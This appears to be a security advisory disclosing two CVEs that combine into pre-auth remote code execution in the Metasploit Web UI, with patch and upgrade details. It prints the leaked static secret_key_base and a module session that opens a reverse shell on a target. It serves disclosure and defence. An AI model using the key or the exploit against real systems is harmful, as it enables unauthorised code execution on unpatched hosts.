Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
173 lines (135 sloc) 8.78 KB

The following two issues combine to constitute a pre-auth Remote Code Execution vulnerability in Metasploit Community, Express and Pro 4.12 where any of certain Weekly Release updates between 4.12.0-2016061501 and 4.12.0-2016083001 have been applied.

Both issues were patched by Rapid7 in Weekly Release 4.12.0-2016091401

A Metasploit Framework module that exploits these issues has been submitted for inclusion at

CVE-2016-1000243 Metasploit Web UI's config.action_dispatch.cookies_serializer is set to :hybrid

Rails applications accept signed cookies for managing sessions. Rails prior to 4.1 used Marshal serialization, which allowed for arbitrary instantiation of objects upon deserialization. Rails 4.1 introduced JSON cookie serialization [0] as the new default. Deserialization of JSON does not allow for arbitrary object instantiation, making it a much safer configuration in the event that the cookie signing key becomes known.

Rails 4.1 also introduced 'hybrid' cookie serialization, which allows for deserialization of both JSON and Marshal serialized cookies. This is to ease the transition from Rails <4.1 to Rails >=4.1 and avoids the invalidation of existing sessions when the server crosses that version boundary.

When the cookie serialization setting is either Marshal or hybrid, a remote unauthenticated attacker with knowledge of the cookie signing key can craft session cookies that, upon Marshal deserialization, trigger the execution of arbitrary code [1].

Metasploit Community, Express and Pro has the Web UI's config.action_dispatch.cookies_serializer setting set to :hybrid before Metasploit 4.12.0-2016091401

Rapid7 changed the Metasploit UI's config.action_dispatch.cookies_serializer setting to :json in Metasploit 4.12.0-2016091401.

Users should upgrade to Metasploit 4.12.0-2016091401 or newer.


CVE-2016-1000244 Metasploit Weekly Release Static secret_key_base pre-auth RCE

Metasploit Community, Express and Pro, after having had any of a particular set of Weekly Release updates applied, will have a static and publicly discoverable secret_key_base value for its Web UI. This allows a remote unauthenticated attacker to craft a signed cookie that will be deserialized by the application. Due to the fact that Metasploit has its config.action_dispatch.cookies_serializer setting set to :hybrid, this allows a remote unauthenticated attacker to cause the deserialization of arbitrary Marshalled objects, resulting in pre-auth RCE as the daemon user.

The known secret_key_base values are as follows:

unreleased build,b4bc1fa288894518088bf70c825e5ce6d5b16bbf20020018272383e09e5677757c6f1cc12eb39421eaf57f81822a434af10971b5762ae64cb1119054078b7201fa6c5e7aacdc00d5837a50b20a049bd502fcf7ed86b360d7c71942b983a547dde26a170bec3f11f42bee6a494dc2c11ae7dbd6d17927349cdcb81f0e9f17d22c

Code execution can be achieved using the Metasploit Framework module exploit/multi/http/rails_secret_deserialization. Note that, as of the time of writing, this module does not work against modern Ruby. There is an open PR [0] that fixes the popchain to make this module great again.

A standalone module that exploits this issue has been submitted for inclusion in Metasploit Framework [1]:

msf exploit(metasploit_static_secret_key_base) > info

       Name: Metasploit Web UI Static secret_key_base Value
     Module: exploit/multi/http/metasploit_static_secret_key_base
   Platform: Ruby
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2016-09-15

Provided by:
  Justin Steven
  joernchen of Phenoelit <>

Available targets:
  Id  Name
  --  ----
  0   Metasploit 4.12.0-2016061501 to 4.12.0-2016083001

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      3790             yes       The target port
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The path to the Metasploit Web UI
  VHOST                       no        HTTP server virtual host

Payload information:

  This module exploits the Web UI for Metasploit Community, Express
  and Pro where one of a certain set of Weekly Releases have been
  applied. These Weekly Releases introduced a static secret_key_base
  value. Knowledge of the static secret_key_base value allows for
  deserialization of a crafted Ruby Object, achieving code execution.
  This module is based on

  OVE (20160904-0002)

msf exploit(metasploit_static_secret_key_base) > set RHOST
msf exploit(metasploit_static_secret_key_base) > set PAYLOAD ruby/shell_reverse_tcp
PAYLOAD => ruby/shell_reverse_tcp
msf exploit(metasploit_static_secret_key_base) > set LHOST
msf exploit(metasploit_static_secret_key_base) > set LPORT 4444
LPORT => 4444
msf exploit(metasploit_static_secret_key_base) > exploit

[*] Started reverse TCP handler on
[*] Checking for cookie _ui_session
[*] Searching for proper SECRET
[*] Sending cookie _ui_session
[*] Command shell session 1 opened ( -> at 2016-09-19 19:26:30 +1000

uid=1(daemon) gid=1(daemon) groups=1(daemon)
Abort session 1? [y/N]  y

[*] - Command shell session 1 closed.  Reason: User exit

Rapid7 addressed this issue in Metasploit 4.12.0-2016091401. Upon installing the update, it will check if one of the known secret_key_base values are in use, and if so, will regenerate it.

Users should upgrade to Metasploit 4.12.0-2016091401 or newer.


Justin Steven